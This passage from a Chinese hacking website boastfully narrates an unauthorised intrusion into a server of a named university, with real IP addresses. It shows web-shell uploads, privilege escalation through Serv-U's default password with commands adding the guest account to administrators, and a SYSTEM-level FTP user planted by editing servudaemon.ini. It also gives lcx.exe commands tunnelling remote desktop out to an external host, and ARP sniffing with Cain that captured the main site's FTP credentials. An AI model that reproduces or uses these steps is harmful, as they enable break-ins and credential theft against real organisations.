当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 看我来入侵复旦大学(图)

看我来入侵复旦大学(图)

2008年10月08日 脚本攻防 我要评论
看我来入侵复旦大学(图) 一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起... 08-10-08

在图12里面,我们可以看到有aspnet这个用户,一般来说很有可能支持aspx,因为aspx马的权限一般要比asp的高。所以我上传了一个aspx马。然后再传了一个su提权的asp马,执行:"net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三条命令,意思是先激活guest用户,再给guest用户设定一个密码,再把guest用户添加进管理员组。幸运的是serv-u的默认连接密码没有改,命令都成功执行了。在aspx马里执行:"net user guest"我们可以发现guest已经隶属于管理员组了,

。用aspx马读取了注册表的远程桌面服务端口,发现就是默认的3389,不过terminal services服务当时是没有开的。后来wyzhack放了鸽子才给开了,嘿嘿。
四、守株待兔
直接连接3389是行不通的,防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用aspx马或者su提权马发现都不能执行lcx.exe进行转发,所以我想通过修改serv-u的配置文件来添加一个具体system权限的ftp用户,再登录上去进行端口转发。就是修改c:\program files\serv-u\servudaemon.ini这个文件的内容啦。如何修改我就不废话了,有兴趣的话大家可以去了解下su配置文件的存放规则,了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的,拥有system权限的ftp用户。要是配置文件没有权限修改的话,可以用su提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了,不过cacls.exe需要文件格式为ntfs的才可以使用哦。在cmd下登录ftp上去,执行:
c:\documents and settings\all users\documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本机执行:
lcx.exe -listen 51 2007
然后连接本机的的2007端口就可以登录远程服务器了,

。到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了,具体请参照我的另一篇关于嗅探入侵的文章。在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1,

。复旦主站的ip为:61.129.42.5。设置好cain就可以开始嗅探攻击了,嘿嘿。由于一开始的那几天是五一假期时间,嗅了两天一无所获。n天之后终于有进展了,wyzhack告诉我已经成功嗅探到复旦主站的ftp用户名和密码了,
(0)

相关文章:

  • 传世木马盗号过程分析

    传世木马盗号过程分析

    传世木马盗号过程分析 玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号... [阅读全文]
  • 浅析*NIX机器的入侵

    浅析*NIX机器的入侵

    浅析*NIX机器的入侵 目前来说*NIX机器早已经成为INTERNRT的主流服务器操作系统了,UNIX系列系统的优势相WINDOWS比较而言优势也是显而易见的... [阅读全文]
  • 一次透过SNIFF有目的性的入侵

    一次透过SNIFF有目的性的入侵

    一次透过SNIFF有目的性的入侵 一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SN... [阅读全文]
  • 渗透某服务器群

    渗透某服务器群

    渗透日本服务器群 因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^开局:入手点是一个注射点:sa,内网, 轻车熟路写个vbs... [阅读全文]
  • 黑客入侵全过程2

    黑客入侵全过程2

    黑客入侵“在线影院”全过程2 遇阻:寻找VOD电影   首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*... [阅读全文]
  • 入侵藏在防火墙后面的机子

    入侵藏在防火墙后面的机子

    入侵藏在防火墙后面的机子 事情是这样的:遭遇一台湾的dns服务器,win2003 server扫描器报告的开放端口:21,53,80ok,弄到一个sa权限的注... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com